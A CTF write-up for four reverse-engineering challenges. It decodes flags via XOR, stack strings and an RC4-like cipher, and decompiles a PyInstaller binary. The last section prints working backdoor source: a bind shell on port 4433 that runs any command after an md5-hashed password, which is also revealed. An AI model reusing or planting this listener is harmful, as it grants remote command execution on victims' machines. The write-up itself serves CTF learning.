Synack Red Team Five CTF Writeup - Rev

nyaarch64 — Thu, 05 May 2022 10:19:30 +0000

I participated in Synack Red Team Five CTF. I solved all 25 challenges and placed 13th out of 333 teams.

You can get challenge descriptions and downloadable files from Hilb3r7/synack-red-team-five-ctf.

reversing

Used tools: Ghidra

Access

Decompile it and find "Access Granted! Submit pin in the flag format." in main function.
pin is compared each character with (&DAT_00102014)[i] ^ 0x20 in checkpin function.
DAT_00102014 is \x4c\x13\x54\x7f\x4d\x45\x7f\x11\x4e\x7f\x4c\x13\x54\x7f\x4d\x45\x45\x45\x45\x7f\x49\x4e\x01\x01\x00
XOR each character with 0x20, it become l3t_me_1n_l3t_meeee_in!!
Make it flag format and HTB{l3t_me_1n_l3t_meeee_in!!} is the flag.

Check

Decompile it and find many local variable assignment in main function.
It's called as stack strings technique.
Select local_58 variable, right click it, select Retype variable and input char[32].
Now we can see the secret, ch3ck_anD_r3checK_aga1n!.
According to printf format Welcome Agent, heres\'s a small gift: HTB{%s}\n,
flag is HTB{ch3ck_anD_r3checK_aga1n!}.

Split

Decompile it and correct some informations:

local_88 = "v!7Xf-;.2=1/";
decrypt, sub1, sub2, sub3 functon
DAT_00102008 value

Read these functions and implement its functionality with Python:

buffer = []

out_buf = ""

for i in range(256):
  buffer.append(i)

local_18 = 0

ctx = "v!7Xf-;.2=1/"
out = [
  0x9f,
  0x69,
  0x43,
  0x1b,
  0x90,
  0x12,
  0x96,
  0x7a,
  0x23,
  0x76,
  0x8f,
  0x2e,
  0x9e,
  0x9f,
  0xeb,
  0x23,
  0x40,
  0xed,
  0xbd,
  0x7a,
  0x4b,
  0x99,
  0xf6,
  0xa0,
  0x0c,
  0x00,
]
ctx_len = len(ctx)

for i in range(256):
  iVar1 = ord(ctx[i % ctx_len]) + buffer[i] + local_18
  uVar2 = (iVar1 >> 0x1f) >> 0x18
  local_18 =(iVar1 + uVar2 & 0xff) - uVar2

  tmp = buffer[i]
  buffer[i] = buffer[local_18]
  buffer[local_18] = tmp

print(buffer)

out_len = len(out)

local_24 = 0
local_20 = 0

for i in range(out_len):
  local_24 = (local_24 + 1) & 0xff
  local_20 = (local_20 + buffer[local_24]) & 0xff
  tmp = buffer[local_20]
  buffer[local_20] = buffer[local_24]
  buffer[local_24] = tmp
  out_buf += (chr(out[i] ^ buffer[(buffer[local_20] + buffer[local_24]) & 0xff]))

print(out_buf)

Execute it and get HTB{d0_th1s_oR_do_th47!?} flag.

Knock Knock

It's a Pyinstaller binary.(I have used it once before, so I just knew it by checking the file.)
Use https://github.com/extremecoders-re/pyinstxtractor to extract its source code archive in binary
(by just running python pyinstxtractor.py ./backdoor or something),
now many .pyc files are extracted.
Find src.pyc and it's malformed as Python3.9, so https://github.com/rocky/python-uncompyle6/ denies to decompile.
But challenge information says it's Python3.8, so I write helloworld python script and execute it with Python3.8.
It yields Python3.8 .pyc file. Analyze it and find signature is \x55.
Change src.pyc's signature from \x61 to \x55 and decompile by running uncompyle6 backdoor-src.38.pyc > backdoor-src.py

backdoor-src.py is:

import socket
from hashlib import md5
from subprocess import check_output
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', 4433))
sock.listen(5)
while True:
    client, addr = sock.accept()
    data = client.recv(32)
    if len(data) != 32:
        client.close()
    else:
        if data.decode() != md5(b't0p_s3kr3t').hexdigest():
            client.send(b'Invalid')
        size = client.recv(1)
        command = client.recv(int.from_bytes(size, 'little'))
        if not command.startswith(b'command:'):
            client.close()
        else:
            command = command.replace(b'command:', b'')
            output = check_output(command, shell=True)
            client.send(output)
            client.close()

Just read it and find secret is md5sum of 't0p_s3kr3t', '8f4328c40b1aa9409012c7406129f04b'.
After sending it, any command following 'command:' will be executed.